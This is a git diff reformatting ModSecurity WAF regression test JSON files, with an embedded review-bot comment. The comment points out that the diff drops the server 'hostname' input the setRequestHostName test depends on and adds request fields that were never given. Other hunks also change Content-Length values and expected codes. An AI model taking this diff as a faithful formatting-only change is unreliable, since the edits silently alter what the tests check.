@@ -1,38 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing function :: setRequestHostName", + "enabled": 1, + "version_min": 300000, + "title": "Testing function :: setRequestHostName", "client": { - "ip":"200.249.12.31" + "ip": "200.249.12.31", + "port": 0 }, - "server":{ - "ip":"200.249.12.31", - "port":80, - "hostname":"modsecurity.org" + "server": { + "ip": "200.249.12.31", + "port": 80 }, "request": { "headers": { - "Host":"www.modsecurity.org" + "Host": "www.modsecurity.org", + "Content-Length": "0" }, - "uri":"/foo?q=attack", - "http_version": 1.1 + "uri": "/foo?q=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/plain" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/plain", + "Content-Length": "10" }, - "body":[ + "body": [ "denystring" ] }, - "expected":{ - "http_code": 403, - "debug_log": "[hostname: \"modsecurity.org\"]" + "expected": { + "debug_log": "[hostname: \"modsecurity.org\"]", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule ARGS_GET \"@contains attack\" \"id:1,phase:2,deny\"" diff --git a/test/test-cases/regression/issue-1152.json b/test/test-cases/regression/issue-1152.json index 54c78f7991..227f08dc05 100644 --- a/test/test-cases/regression/issue-1152.json +++ b/test/test-cases/regression/issue-1152.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
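Review bot: The rewritten `server` object drops `"hostname":"modsecurity.org"`, yet `expected.debug_log` still requires `[hostname: "modsecurity.org"]` and the only other host on the new side is the request header `"Host": "www.modsecurity.org"`. If the harness passes `server.hostname` to the call this case is named after (setRequestHostName; the harness is not visible here), the case loses its input and either fails or stops testing the override. The key should stay, i.e. `"port": 80,` followed by `"hostname": "modsecurity.org"`. The formatter that produced this file probably needs to serialize `hostname` as well. The hunk also adds `"port": 0` to `client` and `"method": "GET"` to `request` where none were given, which changes the test input rather than only its layout.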
@@ -16,8 +16,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 @@ -52,7 +58,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
@@ -64,8 +70,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -73,19 +79,23 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { @@ -102,7 +112,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
@@ -114,8 +124,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -123,19 +133,23 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { @@ -152,7 +166,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
@@ -164,8 +178,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -173,24 +187,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?a=test&b=test&c=test&d=test", + "uri": "/test.pl?a=test&b=test&c=test&d=test", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)" + "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1528.json b/test/test-cases/regression/issue-1528.json index f2257055c2..53c8daa22b 100644 --- a/test/test-cases/regression/issue-1528.json +++ b/test/test-cases/regression/issue-1528.json 
@@ -1,38 +1,46 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion inside regex does not work", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1528", - "gihub_issue": 1528, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?param=attack", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'" - }, - "rules": [ - "SecRuleEngine On", - "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", - "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion inside regex does not work", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1528", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?param=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", + "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1565.json b/test/test-cases/regression/issue-1565.json index 6596404f17..df729affb6 100644 --- a/test/test-cases/regression/issue-1565.json +++ b/test/test-cases/regression/issue-1565.json 
@@ -1,79 +1,92 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + 
}, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" - ] -} - + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1576.json b/test/test-cases/regression/issue-1576.json index eb41e1dfb6..17239727e4 100644 --- a/test/test-cases/regression/issue-1576.json +++ b/test/test-cases/regression/issue-1576.json 
@@ -4,21 +4,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (1)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "158" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -33,18 +38,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0" + "expected": { + "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { 
@@ -52,21 +62,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "30" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "[", " \"one\",", @@ -75,18 +90,23 @@ "]" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)" + "expected": { + "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { 
@@ -94,21 +114,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "215" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -126,18 +151,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)" + "expected": { + "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] } ] diff --git a/test/test-cases/regression/issue-1591.json b/test/test-cases/regression/issue-1591.json index 2b32aa29a2..4ecdaac3f3 100644 
--- a/test/test-cases/regression/issue-1591.json +++ b/test/test-cases/regression/issue-1591.json 
@@ -1,119 +1,140 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1." 
- }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" + ] }, - "expected": { - "debug_log": "Variable: REQUEST_HEADERS:Content-Length" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": 
"__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Variable: REQUEST_HEADERS:Content-Length", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1725.json b/test/test-cases/regression/issue-1725.json index afd7c794e2..092c8862e2 100644 --- a/test/test-cases/regression/issue-1725.json +++ b/test/test-cases/regression/issue-1725.json 
@@ -1,42 +1,48 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion on msg and logdata does not work for DURATION", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1725", - "gihub_issue": 1725, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion on msg and logdata does not work for DURATION", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1725", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1, - "uri": "/test" - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "\/test; 0.[0-9]+; 0.[0-9]+;" - }, - "rules": [ - "SecRuleEngine On", - "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" - ] -} + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "/test", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "/test; 0.[0-9]+; 0.[0-9]+;", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; 
%{MATCHED_VAR}; %{DURATION};'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1743.json b/test/test-cases/regression/issue-1743.json index 5e2b2fad35..bc17ea88b2 100644 --- a/test/test-cases/regression/issue-1743.json +++ b/test/test-cases/regression/issue-1743.json 
@@ -1,74 +1,88 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?x=foo%3d", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { 